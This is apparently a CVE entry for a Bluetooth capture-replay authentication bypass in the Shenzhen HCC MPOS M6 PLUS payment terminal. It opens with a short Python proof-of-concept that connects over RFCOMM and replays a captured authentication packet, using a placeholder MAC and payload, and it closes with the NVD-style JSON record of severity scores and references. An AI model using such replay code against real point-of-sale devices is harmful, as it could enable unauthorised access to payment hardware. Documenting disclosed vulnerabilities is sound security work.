CVE-2026-4583

import bluetooth import time # Conceptual PoC for CVE-2026-4583: Bluetooth Replay Attack # Target: Shenzhen HCC Technology MPOS M6 PLUS # Note: This script demonstrates the logic of a replay attack. # In a real scenario, the 'captured_packet' is obtained via sniffing. def simulate_replay(target_mac, captured_packet): print(f"[+] Targeting device: {target_mac}") try: # Attempt to connect to the Bluetooth device # RFCOMM channel 1 is commonly used, but may vary sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM) sock.connect((target_mac, 1)) print("[+] Connected to target.") # Replay the captured authentication packet print(f"[*] Replaying captured packet: {captured_packet.hex()}") sock.send(captured_packet) # Wait for response to verify bypass data = sock.recv(1024) if data: print("[+] Received response. Authentication bypass potentially successful.") else: print("[-] No response received.") sock.close() except Exception as e: print(f"[-] Error during exploit: {e}") if __name__ == "__main__": # Replace with actual target MAC and captured payload TARGET_MAC = "00:11:22:33:44:55" # Example payload representing a valid auth command PAYLOAD = b"\x01\x05\x00\x04\x00\x00\x00\xFF" simulate_replay(TARGET_MAC, PAYLOAD)

{"cve": {"id": "CVE-2026-4583", "sourceIdentifier": "[email protected]", "published": "2026-03-23T11:16:24.847", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in Shenzhen HCC Technology MPOS M6 PLUS 1V.31-N. Affected by this issue is some unknown functionality of the component Bluetooth Handler. Performing a manipulation results in authentication bypass by capture-replay. The attack must originate from the local network. The attack is considered to have high complexity. The exploitation is known to be difficult. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se detectó una vulnerabilidad en Shenzhen HCC Technology MPOS M6 PLUS 1V.31-N. Afecta a alguna funcionalidad desconocida del componente Gestor de Bluetooth. Realizar una manipulación resulta en omisión de autenticación mediante captura-repetición. El ataque debe originarse desde la red local. Se considera que el ataque tiene alta complejidad. Se sabe que la explotación es difícil. Se contactó al proveedor con antelación sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.3, "baseSeverity": "LOW", "attackVector": "ADJACENT", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:A/AC:H/Au:N/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "ADJACENT_NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.2, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-294"}]}], "references": [{"url": "https://github.com/Davim09/m6plusexploit/blob/main/docs/CVE-2-Replay.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.352420", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.352420", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.775434", "source": "[email protected]"}]}}